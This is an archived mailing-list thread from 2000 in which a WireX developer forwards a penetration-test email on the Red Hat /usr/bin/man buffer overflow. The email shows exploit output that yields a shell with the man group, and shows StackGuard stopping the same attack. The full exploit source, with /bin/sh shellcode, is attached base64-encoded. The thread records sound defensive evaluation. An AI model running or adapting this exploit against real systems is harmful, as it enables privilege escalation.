"Granquist, Lamont" wrote:

> Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on
> RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it).
> And I'm looking for a little help here.  What I've been playing with so
> far is things like the following trying to sort out the parameters of the
> buffer overflow. ... So, anyone got any tips for where to point the RA and
> what the stack

> should look like?

At WireX we've been doing some fresh vulnerability testing.  In the attached
e-mail, M.C.Mar <[EMAIL PROTECTED]> describes his work for us
demonstrating an exploit against the man vulnerability, and then
demonstrating that the StackGuarded version of man is not vulnerable.

We are intent on undertaking a continuous evaluation process of testing every
working stack smashing exploit we can find for StackGuard compatible
platforms (x86/Linux, esp. Red Hat).  We would appreciate any help we can get
in getting live exploits to actually work.  We succeeded with man, but failed
with ircii.

Crispin
-----
Crispin Cowan, CTO, WireX Communications, Inc.    http://wirex.com
Free Hardened Linux Distribution:                 http://immunix.org
                  JOBS!  http://immunix.org/jobs.html
>From - Thu Apr 20 04:46:54 2000
Return-Path: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
Received: from mr1.ipartners.pl (mr1.ipartners.pl [157.25.5.18])
        by mithra.wirex.com (Postfix) with ESMTP id 6C3C93EC14
        for <[EMAIL PROTECTED]>; Tue,  4 Apr 2000 11:25:20 -0700 (PDT)
Received: from zloty.it.com.pl (zloty.it.com.pl [195.94.200.4])
        by mr1.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id UAA83999
        for <[EMAIL PROTECTED]>; Tue, 4 Apr 2000 20:23:08 +0200 (CEST)
        (envelope-from [EMAIL PROTECTED])
Received: from localhost (woloszyn@localhost)
        by zloty.it.com.pl with ESMTP id UAA00373
        for <[EMAIL PROTECTED]>; Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
X-Authentication-Warning: zloty.it.com.pl: woloszyn owned process doing -bs
Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
From: "M.C.Mar" <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
To: Crispin Cowan <[EMAIL PROTECTED]>
Subject: Re: First Penetration Test
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: MULTIPART/DIGEST; BOUNDARY=------------B3356C5E2D4CB4E848D2CED2
Content-ID: <[EMAIL PROTECTED]>
Status:
X-Mozilla-Status: 8011
X-Mozilla-Status2: 00000000
X-UIDL: 3878981500002a3a

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to [EMAIL PROTECTED] for more info.

--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; CHARSET=iso-8859-1
Content-Transfer-Encoding: 8BIT
Content-ID: <[EMAIL PROTECTED]>

OK. I have only two hours today so I started with man.
I compiled vulnerable man sources (man-1.5g-6.src.rpm) with regular
egcs-1.1.2-12.i386 I have installed on my RH 6.0. I Tuned the exploit to
produce shell on my system:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470  len: 4073

sh:F?F   V
      °  NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F   V
                                                           °
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
bash$ id
uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi)
bash$


I attached the exploit.

Then I recompiled the vulnerable code with
gcc-2.7.2.3-14_SGc2_SG121.i386.rpm
and tested StackGuarded code with my explot:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470  len: 4073

sh:F?F   V
      °  NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F   V
                                                           °
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74
in procedure display_cat_file.

As I mentioned at the beginig I have only two hours so I didn't examine the
vulnerable code whether it is posible to exploit the vulnerability
bypassing StacGuard protection.

--
Mariusz Wo³oszyn
Internet Security Specialist, IT -- Internet Partners
E-mail: [EMAIL PROTECTED], [EMAIL PROTECTED]

--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="4man.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[EMAIL PROTECTED]>
Content-Description:
Content-Disposition: attachment; filename="4man.c"

LyoNCiAqIFJld3JpdGVuIGZyb206DQogKiAoYykgMjAwMCBiYWJjaWEgcGFk
bGluYSAvIGIwZg0KICogKGxjYW10dWYncyBpZGVhKQ0KICogYnkgS2lsM3Ig
b2YgTGFtM3JaDQogKiANCiAqIHJlZGhhdCA2LjEgL3Vzci9iaW4vbWFuIGV4
cGxvaXQNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN5
cy9wYXJhbS5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQojaW5jbHVkZSA8
c3RyaW5nLmg+DQoNCiNkZWZpbmUgTk9QCQkweDkwDQojZGVmaW5lIE9GUwkJ
MTgwMA0KI2RlZmluZSBCVUZTSVpFCQk0MDE3DQojZGVmaW5lIEFERFJTCQkx
MDAwDQoNCmxvbmcgZ2V0ZXNwKHZvaWQpDQp7DQogICBfX2FzbV9fKCJtb3Zs
ICVlc3AsICVlYXhcbiIpOw0KfQ0KDQppbnQgbWFpbihhcmdjLCBhcmd2KQ0K
aW50IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsNCgljaGFyICpleGVjc2hlbGwg
PQ0KCSJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2
XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KCSJceDg5XHhmM1x4OGRceDRl
XHgwOFx4OGRceDU2XHgwY1x4Y2RceDgwXHgzMVx4ZGJceDg5XHhkOFx4NDBc
eGNkIg0KCSJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0K
CWNoYXIgYnVmW0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCldLCAqcDsNCglp
bnQgbm9wbGVuLCBpLCBvZnM7DQoJbG9uZyByZXQsICphcDsNCg0KCXJldCA9
IGdldGVzcCgpICsgT0ZTOw0KDQoJbWVtc2V0KGJ1ZixOT1AsQlVGU0laRStz
dHJsZW4oZXhlY3NoZWxsKSk7DQoJbWVtY3B5KGJ1ZitCVUZTSVpFLShzdHJs
ZW4oZXhlY3NoZWxsKSsyMCksZXhlY3NoZWxsLHN0cmxlbihleGVjc2hlbGwp
KTsNCg0KCXA9YnVmK0JVRlNJWkUrc3RybGVuKGV4ZWNzaGVsbCktNDsNCglh
cD0oaW50ICopcDsNCgkqYXA9cmV0OyAvLzB4NDY0NjQ2NDY7DQoNCglmcHJp
bnRmKHN0ZGVyciwgIlJFVDogMHgleCAgbGVuOiAlZFxuXG4iLCByZXQsIHN0
cmxlbihidWYpKTsNCg0KCXNldGVudigiTUFOUEFHRVIiLCBidWYsIDEpOw0K
CWV4ZWNsKCIuL21hbiIsICJtYW4iLCAibHMiLCAwKTsNCg0KCXJldHVybiAw
Ow0KfQ0K
--------------B3356C5E2D4CB4E848D2CED2--

Reply via email to